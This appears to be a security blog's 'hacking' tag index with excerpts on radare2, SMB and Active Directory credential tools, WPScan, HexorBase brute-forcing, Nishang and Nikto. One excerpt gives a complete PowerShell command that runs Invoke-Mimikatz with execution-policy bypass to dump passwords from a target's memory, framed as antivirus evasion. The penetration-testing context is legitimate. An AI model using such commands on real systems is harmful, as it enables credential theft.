Tag: hacking

Disassembling, Radare2, Reversing

Disassembling functions with Radare2

Analyze binary file and its symbols Method 1 radare2 -A c:\Windows\SysWOW64\ntdll.dllradare2 -A c:\Windows\SysWOW64\ntdll.dll Method 2 radare2 c:\Windows\SysWOW64\ntdll.dllradare2 c:\Windows\SysWOW64\ntdll.dll Inside radare2 terminal, type: aaaaaa and hit enter. Disassembling a function Inside radare2 terminal, type: pdf @ sym.ntdll.dll_RtlCreateRegistryKeypdf @ sym.ntdll.dll_RtlCreateRegistryKey You can use tab completion here. Try this instead: pdf @ sym.ntdll.dll_RtlCreateRpdf @ sym.ntdll.dll_RtlCreateR and hit Tab.

SMB

Identify valid credentials within a network

CredNinja is a multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at-scale via SMB. This tool is intended for penetration testers who want to perform an engagement quickly and efficiently. While this tool can be used for more covert operations (including some additions below), it …

Active Directory

Active Directory enumeration from non-domain system

ADEnumerator allows red teamers to query LDAP with a standard user account from a system not joined to a domain. It’s common that during a red team assessment you will harvest credentials from printers, files, etc. But sometimes you don’t know what these credentials do. Instead of throwing the one set of credentials you got …

Nessus

Nessus _qdb_open: invalid table of contents

1. You start Nessus and you get an error while connecting to https://127.0.0.1:8834. 2. You run nessuscli and you get an error indicating: blah blah _qdb_open: invalid table of contents Stop Nessus service service nessusd stopservice nessusd stop Repair Nessus /opt/nessus/sbin/nessusd -R/opt/nessus/sbin/nessusd -R Start Nessus service service nessusd startservice nessusd start

Vulnerabilities

Black box WordPress vulnerability scanner

WPScan is a black box WordPress vulnerability scanner. WPSCAN ARGUMENTS –update Update the database to the latest version. –url | -u The WordPress URL/domain to scan. –force | -f Forces WPScan to not check if the remote site is running WordPress. –enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 …

Brute-force, Cracking

Bruteforce attacks against common database servers

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible …

Penetration Testing, Post-Exploitation

Grabbing Passwords from Memory

* Using Powershell we can bypass AVs easier than using mimikatz.exe which normally is blocked from AVs. * Upload Invoke-Mimikatz.ps1 (part of Nishang Framework) to your target. * Execute remotely: powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"

Penetration Testing, Post-Exploitation

PowerShell for offensive security

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. Usage Import all the scripts in the current PowerShell session. PS C:\nishang> Import-Module .\nishang.psm1PS C:\nishang> Import-Module .\nishang.psm1 Use the individual scripts with dot …

Web Penetration Testing

Web Application Pentest

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index …